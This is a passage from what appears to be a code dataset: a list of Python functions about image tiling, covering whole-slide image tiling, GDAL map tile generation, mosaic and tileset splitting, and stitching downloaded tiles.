multiprocess_filtered_images_to_tiles(display=False, save_summary=True, save_data=True, save_top_tiles=True,\n html=False, image_list=None):\n timer = Time()\n print(\"Generating tile summaries (multiprocess)\\n\")\n\n if save_summary and not os.path.exists(slide.TILE_SUMMARY_DIR):\n os.makedirs(slide.TILE_SUMMARY_DIR)\n\n # how many processes to use\n num_processes = min(multiprocessing.cpu_count(),5)#multiprocessing.cpu_count()\n pool = multiprocessing.Pool(num_processes)\n\n if image_list is not None:\n num_train_images = len(image_list)\n\n if num_processes > num_train_images:\n num_processes = num_train_images\n images_per_process = num_train_images / num_processes\n\n print(\"Number of processes: \" + str(num_processes))\n print(\"Number of training images: \" + str(num_train_images))\n\n tasks = []\n for num_process in range(1, num_processes + 1):\n start_index = (num_process - 1) * images_per_process + 1\n end_index = num_process * images_per_process\n start_index = int(start_index)\n end_index = int(end_index)\n if image_list is not None:\n sublist = image_list[start_index - 1:end_index]\n tasks.append((sublist, display, save_summary, save_data, save_top_tiles))\n print(\"Task #\" + str(num_process) + \": Process slides \" + str(sublist))\n else:\n tasks.append((start_index, end_index, display, save_summary, save_data, save_top_tiles))\n if start_index == end_index:\n print(\"Task #\" + str(num_process) + \": Process slide \" + str(start_index))\n else:\n print(\"Task #\" + str(num_process) + \": Process slides \" + str(start_index) + \" to \" + str(end_index))\n\n # start tasks\n results = []\n for t in tasks:\n if image_list is not None:\n results.append(pool.apply_async(image_list_to_tiles, t))\n else:\n results.append(pool.apply_async(image_range_to_tiles, t))\n\n slide_names = list()\n tile_summaries_dict = dict()\n for result in results:\n image_nums, tile_summaries = result.get()\n slide_names.extend(image_nums)\n tile_summaries_dict.update(tile_summaries)\n print(\"Done tiling slides: %s\" % image_nums)\n\n if html:\n generate_tiled_html_result(slide_names, tile_summaries_dict, save_data)\n\n print(\"Time to generate tile previews (multiprocess): %s\\n\" % str(timer.elapsed()))", "def _tile_images(imgs, tile_shape, concatenated_image, margin_color=None):\n x_num, y_num = tile_shape\n one_width = imgs[0].shape[1]\n one_height = imgs[0].shape[0]\n if concatenated_image is None:\n concatenated_image = np.zeros((one_height * y_num, one_width * x_num, 3),\n dtype=np.uint8)\n if margin_color is not None:\n concatenated_image[:, :] = margin_color\n for y in range(y_num):\n for x in range(x_num):\n i = x + y * x_num\n if i >= len(imgs):\n pass\n else:\n concatenated_image[y*one_height:(y+1)*one_height,x*one_width:(x+1)*one_width,] = imgs[i]\n return concatenated_image", "def main():\n\tparser = construct_parser()\n\targs = parser.parse_args()\n\ttiles = slice(args.image, args.num_tiles, save=False)\n\tsave_tiles(tiles, prefix=get_basename(args.image), directory=args.dir,\n\t\t format=args.format)", "def generate_tiles(self):\n if self.children:\n for child in self.children:\n child.generate_tiles()\n print \"Generating tile for %s using child tiles\" % self.bbox\n self.generate_tile_from_child_tiles()\n else:\n print \"Generating tile for %s using source data\" % self.bbox\n self.generate_tile_from_source()", "def readTiles(self):\n TileImage = Image.open(self.Filename).convert(\"RGB\")\n TileIW, TileIH = TileImage.size\n TilesetW, TilesetH = TileIW // self.TileWidth, TileIH // self.TileHeight\n\n for y in range(TilesetH):\n for x in range(TilesetW):\n box = self.TileWidth * x, self.TileHeight * y, self.TileWidth * (x+1), self.TileHeight * (y+1)\n tile = TileImage.crop(box)\n self.List.append(tile)\n\n str = tile.tostring()\n if not str in self.TileDict:\n #print(\"add tile: \", str)\n self.TileDict[str] = len(self.List) - 1\n print(\"tile count: {}, unique count: {}\".format(len(self.List),len(self.TileDict.values())))", "def create_tiles(self, zoom):\n # Compute the tile x-y-z index range for the rasterlayer for this zoomlevel\n bbox = self.rasterlayer.extent()\n indexrange = tiler.tile_index_range(bbox, zoom)\n\n # Compute scale of tiles for this zoomlevel\n tilescale = tiler.tile_scale(zoom)\n\n # Count the number of tiles that are required to cover the raster at this zoomlevel\n nr_of_tiles = (indexrange[2] - indexrange[0] + 1) * (indexrange[3] - indexrange[1] + 1)\n\n # Create destination raster file\n self.log('Snapping dataset to zoom level {0}'.format(zoom))\n\n bounds = tiler.tile_bounds(indexrange[0], indexrange[1], zoom)\n sizex = (indexrange[2] - indexrange[0] + 1) * self.tilesize\n sizey = (indexrange[3] - indexrange[1] + 1) * self.tilesize\n dest_file = os.path.join(self.tmpdir, 'djangowarpedraster' + str(zoom) + '.tif')\n\n snapped_dataset = self.dataset.warp({\n 'name': dest_file,\n 'origin': [bounds[0], bounds[3]],\n 'scale': [tilescale, -tilescale],\n 'width': sizex,\n 'height': sizey,\n })\n\n self.log('Creating {0} tiles for zoom {1}.'.format(nr_of_tiles, zoom))\n\n counter = 0\n for tilex in range(indexrange[0], indexrange[2] + 1):\n for tiley in range(indexrange[1], indexrange[3] + 1):\n # Log progress\n counter += 1\n if counter % 250 == 0:\n self.log('{0} tiles created at zoom {1}'.format(counter, zoom))\n\n # Calculate raster tile origin\n bounds = tiler.tile_bounds(tilex, tiley, zoom)\n\n # Construct band data arrays\n pixeloffset = (\n (tilex - indexrange[0]) * self.tilesize,\n (tiley - indexrange[1]) * self.tilesize\n )\n\n band_data = [\n {\n 'data': band.data(offset=pixeloffset, size=(self.tilesize, self.tilesize)),\n 'nodata_value': band.nodata_value\n } for band in snapped_dataset.bands\n ]\n\n # Add tile data to histogram\n if zoom == self.max_zoom:\n self.push_histogram(band_data)\n\n # Warp source raster into this tile (in memory)\n dest = GDALRaster({\n 'width': self.tilesize,\n 'height': self.tilesize,\n 'origin': [bounds[0], bounds[3]],\n 'scale': [tilescale, -tilescale],\n 'srid': WEB_MERCATOR_SRID,\n 'datatype': snapped_dataset.bands[0].datatype(),\n 'bands': band_data,\n })\n\n # Store tile\n RasterTile.objects.create(\n rast=dest,\n rasterlayer=self.rasterlayer,\n tilex=tilex,\n tiley=tiley,\n tilez=zoom\n )\n\n # Store histogram data\n if zoom == self.max_zoom:\n bandmetas = RasterLayerBandMetadata.objects.filter(rasterlayer=self.rasterlayer)\n for bandmeta in bandmetas:\n bandmeta.hist_values = self.hist_values[bandmeta.band].tolist()\n bandmeta.save()\n\n # Remove snapped dataset\n self.log('Removing snapped dataset.', zoom=zoom)\n snapped_dataset = None\n os.remove(dest_file)", "def img_to_tiles(cls, tiff_path, region, res, tile, tile_date_path, img_format, mp):\n\n # Get metadata from original image\n metadata = TiffMetadata(tiff_path)\n\n WIDTH, HEIGHT = region.calculate_width_height(res)\n ultra_large = False\n if WIDTH * HEIGHT > 2 * Image.MAX_IMAGE_PIXELS:\n ultra_large = True\n\n # Use the following dictionary to get the coordinates of each tile\n geoTran_d = TileUtils.getGeoTransform(tiff_path)\n\n # Check for valid tiling dimensions\n if (tile.width > WIDTH or tile.height > HEIGHT):\n raise argparse.ArgumentTypeError(\"Tiling dimensions greater than image dimensions\")\n\n # Determine the number of tiles per row and column\n if tile.handling == Handling.discard_incomplete_tiles:\n num_rows = (HEIGHT - tile.height * tile.overlap) // (tile.height * (1 - tile.overlap))\n num_cols = (WIDTH - tile.width * tile.overlap) // (tile.width * (1 - tile.overlap))\n else:\n num_rows = math.ceil((HEIGHT - tile.height * tile.overlap) / (tile.height * (1 - tile.overlap)))\n num_cols = math.ceil((WIDTH - tile.width * tile.overlap) / (tile.width * (1 - tile.overlap)))\n\n num_iterations = num_rows * num_cols\n \n # Find the pixel coordinate extents of each tile to be generated\n print(\"Gathering tiling information...\", end=\"\", flush=True)\n if mp:\n with Pool(processes=NUM_CORES) as pool:\n args = zip(repeat((metadata, tile, WIDTH, HEIGHT, geoTran_d, tile_date_path, num_rows, num_cols)), list(range(num_iterations)))\n pixel_coords = pool.map(getTilingSplitCoordsMP, args)\n else:\n pixel_coords = []\n for index in range(num_iterations):\n pixel_coords.append(getTilingSplitCoordsTuple(metadata,tile, WIDTH, HEIGHT, geoTran_d, tile_date_path, num_rows, num_cols, index))\n print(\"done!\")\n\n if mp:\n print(\"Generating {} tiles using {} processes...\".format(len(pixel_coords), NUM_CORES), flush=True)\n else:\n print(\"Generating {} tiles sequentially...\".format(len(pixel_coords)), flush=True)\n\n if ultra_large: \n # Create the intermediate tiles\n inter_dir, img_width, img_height = TileUtils.img_to_intermediate_images(tiff_path, tile, WIDTH, HEIGHT, metadata.date, img_format)\n\n # Add each coordinate to its proper list\n intermediate_files = [f for f in os.listdir(inter_dir) if f.endswith(img_format)]\n\n # Get the tiling information for all intermediate tiles\n intermediate_info = TileUtils.getIntermediateTilingInfo(tile, pixel_coords, WIDTH, HEIGHT, img_width, img_height, intermediate_files)\n\n # Tile the complete images\n print(\"\\tTiling from complete images\")\n for single_inter_imgs in tqdm(intermediate_info[0]):\n filename = single_inter_imgs[0][0]\n inter_metadata = IntermediateMetadata(filename)\n\n img_path = os.path.join(inter_dir, filename)\n src = Image.open(img_path)\n img_arr = np.array(src)\n\n if mp:\n # Create a shared array\n X_shape = img_arr.shape\n X = RawArray('B', X_shape[0] * X_shape[1] * X_shape[2])\n\n # Wrap shared array as numpy array\n X_np = np.frombuffer(X, dtype='uint8').reshape(X_shape)\n\n # Copy image to the shared array\n np.copyto(X_np, img_arr)\n \n # Use multiprocessing to tile the numpy array\n with Pool(processes=NUM_CORES, initializer=init_worker, initargs=(X, X_shape, None, None)) as pool:\n multi = [pool.apply_async(TileUtils.generate_tile, args=(tile, WIDTH, HEIGHT, x, y, done_x, done_y, path, img_format,), kwds={\"inter_x\":(x - inter_metadata.start_x), \"inter_y\":(y - inter_metadata.start_y)}) for (filename, x, y, done_x, done_y, path) in single_inter_imgs]\n f = [p.get() for p in multi]\n pool.close()\n pool.join()\n else: \n for filename, x, y, done_x, done_y, path in single_inter_imgs:\n TileUtils.generate_tile(tile, WIDTH, HEIGHT, x, y, done_x, done_y, path, img_format, inter_x=(x - inter_metadata.start_x), inter_y=(y - inter_metadata.start_y), img_arr=img_arr)\n\n # Close the image\n src.close()\n # Tile in between two images\n print(\"\\tTiling between two images\")\n if mp:\n with Pool(processes=NUM_CORES) as pool:\n args = zip(repeat((tile.width, tile.height, inter_dir, img_format)), intermediate_info[1])\n result = list(tqdm(pool.imap(processDoublesMP, args), total=len(intermediate_info[1])))\n else:\n for double_inter_imgs in tqdm(intermediate_info[1]):\n processDoublesTuple(tile.width, tile.height, inter_dir, img_format, double_inter_imgs)\n \n # Tile in between four images\n print(\"\\tTiling between four images\")\n if mp:\n # Use half as many processes as cores to ensure not running out of available mem and getting stuck\n with Pool(processes=(NUM_CORES // 2)) as pool:\n args = zip(repeat((tile.width, tile.height, inter_dir, img_format)), intermediate_info[2])\n result = list(tqdm(pool.imap(processQuadsMP, args), total=len(intermediate_info[2])))\n else:\n for quad_inter_imgs in tqdm(intermediate_info[2]):\n processQuadsTuple(tile.width, tile.height, inter_dir, img_format, quad_inter_imgs)\n shutil.rmtree(inter_dir)\n else: \n # Open image as a numpy array in order to tile from the array\n src = Image.open(tiff_path)\n img_arr = np.array(src)\n\n if mp:\n # Create a shared array\n X_shape = img_arr.shape\n X = RawArray('B', X_shape[0] * X_shape[1] * X_shape[2])\n\n # Wrap shared array as numpy array\n X_np = np.frombuffer(X, dtype='uint8').reshape(X_shape)\n\n # Copy image to the shared array\n np.copyto(X_np, img_arr)\n\n # Use multiprocessing to tile the numpy array\n with Pool(processes=NUM_CORES, initializer=init_worker, initargs=(X, X_shape, None, None)) as pool:\n multi = [pool.apply_async(TileUtils.generate_tile, args=(tile, WIDTH, HEIGHT, x, y, done_x, done_y, path, img_format)) for (x, y, done_x, done_y, path) in pixel_coords]\n f = [p.get() for p in tqdm(multi)]\n pool.close()\n pool.join()\n else:\n for x, y, done_x, done_y, path in tqdm(pixel_coords):\n TileUtils.generate_tile(tile, WIDTH, HEIGHT, x, y, done_x, done_y, path, img_format, img_arr=img_arr)\n \n # Close the image\n src.close()\n print(\"done!\")", "def stich(data, title=None):\n # Get name, list of tiles, width and height\n name = data[\"levels\"][0][\"name\"] \n tiles = data[\"levels\"][0][\"tiles\"]\n width = data[\"levels\"][0][\"width\"]\n height = data[\"levels\"][0][\"height\"]\n\n # Create the directory to place all the downloaded tiles in\n if title: #if title provided, name directory based on that\n dirname = title\n else: #if title not provided, generate a name\n dirname = name + str(width) + str(height)\n os.makedirs(dirname, exist_ok=True)\n os.chdir(dirname)\n\n #Create the empty image based on dimensions\n result = Image.new('RGB', (width, height))\n tile_size = None \n\n # actually get the tiles\n for i in tiles:\n image = get_tile(i['url']) #download image\n if not tile_size:\n tile_size = image.size[0] # on the first tile get the image size\n result.paste(im=image, box=(i['x'] * tile_size, i['y'] * tile_size)) # each tile has a number which isn't\n # it's cooridnate in pixels but it's order. \n # To get pixel coordinate just multiply by the size of each tile\n result.save('final.jpeg') # save file in directory\n os.chdir(os.path.join( os.path.dirname( __file__ ), '..' )) # then navigate back up to the base directory", "def load_image_parts(self, filename, margin, spacing, tile_width, tile_height, colorkey=None): #-> [images]\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def load_image_parts(self, filename, margin, spacing, tile_width, tile_height, colorkey=None): #-> [images]\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def _generate_images(self, trace):\n images = []\n colors = []\n colors_by_shape = {}\n for board in trace:\n width = int(round((float(board.shape[1]) / board.shape[0]) * self._height))\n cellsize = width / board.shape[1] # cell size\n img = np.zeros((self._height, width, 3), dtype=np.uint8)\n\n tiles = {} # map from integer rep. of the tile to a shape\n for y in range(board.shape[0]):\n for x in range(board.shape[1]):\n cell = board[y,x]\n if cell not in tiles:\n tiles[cell] = (x, y, 1, 1) # x, y, w, h\n else:\n cur_x, cur_y, cur_w, cur_h = tiles[cell]\n if x >= cur_x + cur_w:\n cur_w = (x-cur_x) + 1\n if y >= cur_y + cur_h:\n cur_h = (y-cur_y) + 1\n tiles[cell] = (cur_x, cur_y, cur_w, cur_h)\n\n # Colors\n if len(colors_by_shape) == 0:\n for tid in tiles:\n shape = (tiles[tid][2], tiles[tid][3])\n if shape not in colors_by_shape:\n colors_by_shape[shape] = hex_to_rgb(random_unique_color(colors))\n colors.append(colors_by_shape[shape])\n\n for tid in tiles:\n x, y, w, h = tiles[tid]\n shape = (w,h)\n empty = board[y,x] == 0\n x, y, w, h = x*cellsize, y*cellsize, w*cellsize, h*cellsize\n # Draw a filled rectangle without color\n if not empty:\n cv2.rectangle(img, (x, y), (x+w, y+h), colors_by_shape[shape],-1)\n else:\n cv2.rectangle(img, (x, y), (x+w, y+h), [0,0,0], -1) #, 8)-\n # Draw a boundary\n cv2.rectangle(img, (x, y), (x+w, y+h), (0, 0, 0), 2, 8)\n \n images.append(img)\n return images", "def get_tiles():\n\t\t\n\tcursor = get_cursor()\n\t\n\tcursor.execute(\"SELECT * FROM fitmeimages ORDER BY shade ASC, id ASC\")\n\treturn cursor.fetchall();", "def get_tiles(self) -> list:\n n_rows = self.mosaic_dimensions[0]\n n_columns = self.mosaic_dimensions[1]\n return [\n self.get_tile(i_row, i_column)\n for i_row in range(n_rows)\n for i_column in range(n_columns)\n ]", "def tile_images(img, img_size=32, rows=4, cols=4, spacing=1):\n images = np.ones([3, rows * (img_size + spacing) - spacing, cols * (img_size + spacing)], dtype=np.float32)\n coords = [(i, j) for i in range(rows) for j in range(cols)]\n\n for (i, j), image in zip(coords, img):\n x = i * (img_size + spacing)\n y = j * (img_size + spacing)\n images[:, x: x+img_size, y:y+img_size] = image\n\n return images", "def build_filler_images(self):", "def generate_base_tiles(self):\n\n if not self.options.quiet:\n print(\"Generating Base Tiles:\")\n\n if self.options.verbose:\n print('')\n print(\"Tiles generated from the max zoom level:\")\n print(\"----------------------------------------\")\n print('')\n\n # Set the bounds\n tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]\n\n ds = self.warped_input_dataset\n tilebands = self.dataBandsCount + 1\n querysize = self.querysize\n\n if self.options.verbose:\n print(\"dataBandsCount: \", self.dataBandsCount)\n print(\"tilebands: \", tilebands)\n\n tcount = (1+abs(tmaxx-tminx)) * (1+abs(tmaxy-tminy))\n ti = 0\n\n tile_details = []\n\n tz = self.tmaxz\n for ty in range(tmaxy, tminy-1, -1):\n for tx in range(tminx, tmaxx+1):\n\n ti += 1\n ytile = GDAL2Tiles.getYtile(ty, tz, self.options)\n tilefilename = os.path.join(\n self.output_folder, str(tz), '{0:04d}'.format(tx) + \"_\" + '{0:04d}'.format(ytile) + \".\" + self.tileext)\n if self.options.verbose:\n print(ti, '/', tcount, tilefilename)\n\n if self.options.resume and os.path.exists(tilefilename):\n if self.options.verbose:\n print(\"Tile generation skipped because of --resume\")\n continue\n\n # Create directories for the tile\n if not os.path.exists(os.path.dirname(tilefilename)):\n os.makedirs(os.path.dirname(tilefilename))\n\n if self.options.profile == 'mercator':\n # Tile bounds in EPSG:3857\n b = self.mercator.TileBounds(tx, ty, tz)\n elif self.options.profile == 'geodetic':\n b = self.geodetic.TileBounds(tx, ty, tz)\n\n # Don't scale up by nearest neighbour, better change the querysize\n # to the native resolution (and return smaller query tile) for scaling\n\n if self.options.profile in ('mercator', 'geodetic'):\n rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1])\n\n # Pixel size in the raster covering query geo extent\n nativesize = wb[0] + wb[2]\n if self.options.verbose:\n print(\"\\tNative Extent (querysize\", nativesize, \"): \", rb, wb)\n\n # Tile bounds in raster coordinates for ReadRaster query\n rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1], querysize=querysize)\n\n rx, ry, rxsize, rysize = rb\n wx, wy, wxsize, wysize = wb\n\n else: # 'raster' profile:\n\n tsize = int(self.tsize[tz]) # tilesize in raster coordinates for actual zoom\n xsize = self.warped_input_dataset.RasterXSize # size of the raster in pixels\n ysize = self.warped_input_dataset.RasterYSize\n if tz >= self.nativezoom:\n querysize = self.tilesize\n\n rx = (tx) * tsize\n rxsize = 0\n if tx == tmaxx:\n rxsize = xsize % tsize\n if rxsize == 0:\n rxsize = tsize\n\n rysize = 0\n if ty == tmaxy:\n rysize = ysize % tsize\n if rysize == 0:\n rysize = tsize\n ry = ysize - (ty * tsize) - rysize\n\n wx, wy = 0, 0\n wxsize = int(rxsize/float(tsize) * self.tilesize)\n wysize = int(rysize/float(tsize) * self.tilesize)\n if wysize != self.tilesize:\n wy = self.tilesize - wysize\n\n # Read the source raster if anything is going inside the tile as per the computed\n # geo_query\n tile_details.append(\n TileDetail(\n tx=tx, ty=ytile, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx,\n wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize,\n )\n )\n\n conf = TileJobInfo(\n src_file=self.tmp_vrt_filename,\n nb_data_bands=self.dataBandsCount,\n output_file_path=self.output_folder,\n tile_extension=self.tileext,\n tile_driver=self.tiledriver,\n tile_size=self.tilesize,\n kml=self.kml,\n tminmax=self.tminmax,\n tminz=self.tminz,\n tmaxz=self.tmaxz,\n in_srs_wkt=self.in_srs_wkt,\n out_geo_trans=self.out_gt,\n ominy=self.ominy,\n is_epsg_4326=self.isepsg4326,\n options=self.options,\n )\n\n return conf, tile_details", "def generate_overlay_images(self, overlay_name, x, y):\n for tile in range(1, self.config.number_of_tiles + 1):\n for time in self.config.time_points:\n for depth in self.config.depth_points:\n desc = self.config.tile_description_generator(tile, time, depth)\n file_name = self._generate_overlay_file_name(self.well, overlay_name, desc)\n self._generate_overlay(file_name, overlay_name + '-' + self.well + '-' + desc, x, y)", "def iter_tiles(data_sampler, depth, merge=True):\n if merge is True:\n merge = _default_merge\n\n parents = defaultdict(dict)\n\n for node, c, increasing in iter_corners(max(depth, 1),\n bottom_only=merge):\n\n l, b = subsample(c[0], c[1], c[2], c[3], 256, increasing)\n img = data_sampler(l, b)\n\n for pth, img in _trickle_up(img, node, parents, merge, depth):\n yield pth, img", "def image_list_to_tiles(image_list, display=False, save_summary=True, save_data=True, save_top_tiles=True):\n tile_summaries_dict = dict()\n for slide_name in image_list:\n tile_summary = summary_and_tiles(slide_name, display, save_summary, save_data, save_top_tiles)\n tile_summaries_dict[slide_name] = tile_summary\n return image_list, tile_summaries_dict", "def open_images_in(directory):\n\n files = [\n filename\n for filename in os.listdir(directory)\n if \"_\" in filename and not filename.startswith(\"joined\")\n ]\n tiles = []\n if len(files) > 0:\n i = 0\n for file in files:\n pos = get_image_column_row(file)\n im = Image.open(os.path.join(directory, file))\n\n position_xy = [0, 0]\n count = 0\n for a, b in zip(pos, im.size):\n position_xy[count] = a * b\n count = count + 1\n tiles.append(\n Tile(\n image=im,\n position=pos,\n number=i + 1,\n coords=position_xy,\n filename=file,\n )\n )\n i = i + 1\n return tiles", "def gen_imgs(samples, batch_size, shuffle=False):\n \n num_samples = len(samples)\n print(num_samples)\n \n \n images = []\n \n for _, batch_sample in batch_samples.iterrows():\n \n with openslide.open_slide(batch_sample.slide_path) as slide:\n tiles = DeepZoomGenerator(slide, tile_size=224, overlap=0, limit_bounds=False)\n print(batch_sample.tile_loc[::], batch_sample.tile_loc[::-1])\n img = tiles.get_tile(tiles.level_count-1, batch_sample.tile_loc[::-1])\n \n \n images.append(np.array(img))\n\n X_train = np.array(images)\n \n yield X_train", "def make_random_tiles(sx=500, sy=500, sz=0, nb=50, noise_sigma=None,\n regular=True, double_pattern_y=False, double_pattern_z=False, \n assym_y=True, assym_z=True, return_image=False):\n \n if sz == 0:\n image = np.zeros((sy, sx))\n # to overcome an issue with odd nb:\n nb = int(np.ceil(nb / 2) * 2)\n \n if regular:\n x = np.linspace(start=0, stop=sx-1, num=nb, dtype=int)\n x = np.hstack((x[::2], x[1::2]))\n if assym_y:\n nb = nb*2\n y = np.linspace(start=0, stop=sy-1, num=nb, dtype=int)\n if double_pattern_y:\n y = np.hstack((y[::2], y[1::2]))\n x_id = np.tile(x, y.size//2)\n y_id = np.repeat(y, x.size//2)\n else:\n x_id = np.random.randint(sx, size=nb)\n y_id = np.random.randint(sy, size=nb)\n \n if noise_sigma is not None:\n x_id = x_id + np.random.normal(loc=0.0, scale=noise_sigma, size=x_id.size)\n x_id[x_id<0] = 0\n x_id[x_id>sx-1] = sx-1\n x_id = np.round(x_id).astype(int)\n y_id = y_id + np.random.normal(loc=0.0, scale=noise_sigma, size=y_id.size)\n y_id[y_id<0] = 0\n y_id[y_id>sy-1] = sy-1\n y_id = np.round(y_id).astype(int)\n \n coords = np.vstack((x_id, y_id)).T\n image[y_id, x_id] = 1\n masks = segmentation.watershed(-image)\n else:\n # make 3D simulation\n image = np.zeros((sz, sy, sx))\n # to overcome an issue with odd nb:\n nb = int(np.ceil(nb / 2) * 2)\n \n if regular:\n x = np.linspace(start=0, stop=sx-1, num=nb, dtype=int)\n x = np.hstack((x[::2], x[1::2]))\n if assym_y:\n nb_y = nb*2\n y = np.linspace(start=0, stop=sy-1, num=nb_y, dtype=int)\n if assym_z:\n nb_z = nb*2\n z = np.linspace(start=0, stop=sz-1, num=nb_z, dtype=int)\n if double_pattern_y:\n y = np.hstack((y[::2], y[1::2]))\n if double_pattern_z:\n z = np.hstack((z[::2], z[1::2]))\n x_id = np.tile(x, y.size//2)\n y_id = np.repeat(y, x.size//2)\n z_id = np.repeat(z, x.size//2)\n else:\n x_id = np.random.randint(sx, size=nb)\n y_id = np.random.randint(sy, size=nb)\n z_id = np.random.randint(sz, size=nb)\n \n if noise_sigma is None:\n print(\"For 3D simulations noise_sigma needs to be > 0\")\n print(\"Setting noise_sigma to 1\")\n noise_sigma = 1\n # x\n x_id = x_id + np.random.normal(loc=0.0, scale=noise_sigma, size=x_id.size)\n x_id[x_id<0] = 0\n x_id[x_id>sx-1] = sx-1\n x_id = np.round(x_id).astype(int)\n # y\n y_id = y_id + np.random.normal(loc=0.0, scale=noise_sigma, size=y_id.size)\n y_id[y_id<0] = 0\n y_id[y_id>sy-1] = sy-1\n y_id = np.round(y_id).astype(int)\n # z\n z_id = z_id + np.random.normal(loc=0.0, scale=noise_sigma, size=z_id.size)\n z_id[z_id<0] = 0\n z_id[z_id>sz-1] = sz-1\n z_id = np.round(z_id).astype(int)\n \n coords = np.vstack((x_id, y_id, z_id)).T\n image[z_id, y_id, x_id] = 1\n masks = segmentation.watershed(-image)\n\n if return_image:\n return coords, masks, image\n else:\n return coords, masks", "def test_generate_tiles(self):\n tile_list = utils.generate_tiles()\n self.assertEqual(len(tile_list), utils.TILE_COUNT)", "def _split_image_into_tiles(\n self, image: np.ndarray\n ) -> t.Sequence[t.Tuple[t.Tuple[t.Any, ...], np.ndarray]]:\n h, w, c = image.shape\n tile_height = (\n math.ceil(h / (self._n_tiles // 2 - 1))\n if self._n_tiles > 4\n else math.ceil(h / (self._n_tiles // 2))\n )\n tile_width = math.ceil(w / (self._n_tiles // 2))\n tiles = [] # type: ignore\n for i in range(0, h, tile_height):\n for j in range(0, w, tile_width):\n tiles.append(\n (\n (i, i + tile_height, j, j + tile_width),\n image[i : i + tile_height, j : j + tile_width, :],\n )\n )\n return tiles", "def image_to_tiles(img, tile_size):\n padding_argument = [(0,0),(0,0),(0,0)]\n for input_dim in [0,1]:\n padding_argument[input_dim] = (0, (tile_size - img.shape[input_dim]) % tile_size)\n img = np.pad(img, padding_argument, mode='constant')\n tiles = img.reshape((img.shape[0]//tile_size, \n tile_size,\n img.shape[1]//tile_size,\n tile_size,\n img.shape[2]\n )).swapaxes(1,2)\n return tiles", "def saveTiles(z, x, y, ntiles, mapname, image, suffix = 'png', imgtype = None):\n for dx in range(0, ntiles):\n tilex = x*ntiles + dx\n ensureDirExists(getTileDir(mapname, z, tilex))\n for dy in range(0, ntiles): \n tiley = y*ntiles + dy\n offsetx = BORDER_WIDTH + dx*TILE_SIZE\n offsety = BORDER_WIDTH + dy*TILE_SIZE\n view = image.view(offsetx, offsety, TILE_SIZE, TILE_SIZE)\n if imgtype:\n view.save(getTilePath(mapname, z, tilex, tiley, suffix), imgtype)\n else:\n view.save(getTilePath(mapname, z, tilex, tiley, suffix))", "def generate_base_tiles(self):\n\n gdal.SetConfigOption(\"GDAL_PAM_ENABLED\", \"NO\")\n\n print \"Generating Base Tiles:\"\n if self.options.verbose:\n #mx, my = self.out_gt[0], self.out_gt[3] # OriginX, OriginY\n #px, py = self.mercator.MetersToPixels( mx, my, self.tmaxz)\n #print \"Pixel coordinates:\", px, py, (mx, my)\n print\n print \"Tiles generated from the max zoom level:\"\n print \"----------------------------------------\"\n print\n\n\n # Set the bounds\n tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]\n querysize = self.querysize\n\n # Just the center tile\n #tminx = tminx+ (tmaxx - tminx)/2\n #tminy = tminy+ (tmaxy - tminy)/2\n #tmaxx = tminx\n #tmaxy = tminy\n\n #print tminx, tminy, tmaxx, tmaxy\n tcount = (1+abs(tmaxx-tminx)) * (1+abs(tmaxy-tminy))\n #print tcount\n ti = 0\n i_y_column_count=((tmaxy-tminy)+1)\n ds = self.out_ds\n tz = self.tmaxz\n if self.options.verbose:\n # tx in range(tminx, tmaxx+1) tminx[ 281596 ] tmaxx[ 281744 ] ; ((tmaxx-tmaxy)+1) x_tiles[ 23393 ]\n print \"\\ttz=[\",tz,\"] : tx in range(tminx, tmaxx+1) tminx[\",tminx,\"] tmaxx[\",tmaxx,\"] ; ((tmaxx-tmaxy)+1) x_tiles[\",tcount,\"]\"\n # ty_tms in range(tmaxy, tminy-1, -1) tmaxy[ 352409 ] tminy[ 352253 ] ; ((tmaxy-tminy)) y_tiles[ 157 ] 352409-(352253-1)\n print \"\\ttz=[\",tz,\"] : ty_tms in range(tmaxy, tminy-1, -1) tmaxy[\",tmaxy,\"] tminy[\",tminy,\"] ; ((tmaxy-tminy+1)) y_tiles[\",i_y_column_count,\"]\"\n if self.options.resume:\n i_count = self.tile_exists(0, 0, tz,2)\n if i_count == tcount:\n if self.options.verbose:\n print \"\\tTile generation skipped because of --resume ; x/y-tiles of z[\",tz,\"] y_tiles[\",tcount,\"]\"\n return\n for tx in range(tminx, tmaxx+1):\n tmaxy_work=tmaxy\n if self.options.resume:\n i_count = self.tile_exists(tx, 0, tz,3)\n if i_count == i_y_column_count:\n if self.options.verbose:\n print \"\\tTile generation skipped because of --resume ; z =\",tz,\" ; y-tiles of x[\",tx,\"] y_tiles[\",i_y_column_count,\"]\"\n break\n else:\n if i_count > 0:\n # this assums the rows are compleate, which may NOT be true\n tmaxy_work-=i_count\n if self.options.verbose:\n print \"\\tTile generation skipped to tmaxy[\",tmaxy_work,\"] because of --resume ; z =\",tz,\" ; y-tiles of x[\",tx,\"] y_tiles[\",i_y_column_count,\"]\"\n for ty_tms in range(tmaxy_work, tminy-1, -1): #range(tminy, tmaxy+1):\n ty_osm=self.flip_y(tz,ty_tms)\n ty=ty_tms\n if self.options.tms_osm:\n ty=ty_osm\n if self.stopped:\n if self.options.mbtiles:\n if self.mbtiles_db:\n self.mbtiles_db.close_db()\n break\n ti += 1\n\n if self.options.resume:\n exists = self.tile_exists(tx, ty, tz,0)\n if exists and self.options.verbose:\n print \"\\tTile generation skipped because of --resume ; z =\",tz,\" ; x =\",tx,\" ; y_tms =\",ty_tms, \"; y_osm =\",ty_osm\n else:\n exists = False\n\n if not exists:\n if self.options.verbose:\n print ti, '/', tcount, self.get_verbose_tile_name(tx, ty, tz)\n # Don't scale up by nearest neighbour, better change the querysize\n # to the native resolution (and return smaller query tile) for scaling\n if self.options.profile in ('mercator','geodetic'):\n if self.options.profile == 'mercator':\n # Tile bounds in EPSG:900913\n b = self.mercator.TileBounds(tx, ty_tms, tz)\n elif self.options.profile == 'geodetic':\n b = self.geodetic.TileBounds(tx, ty_tms, tz)\n\n rb, wb = self.geo_query( ds, b[0], b[3], b[2], b[1])\n nativesize = wb[0]+wb[2] # Pixel size in the raster covering query geo extent\n if self.options.verbose:\n print \"\\tNative Extent (querysize\",nativesize,\"): \", rb, wb\n\n querysize = self.querysize\n # Tile bounds in raster coordinates for ReadRaster query\n rb, 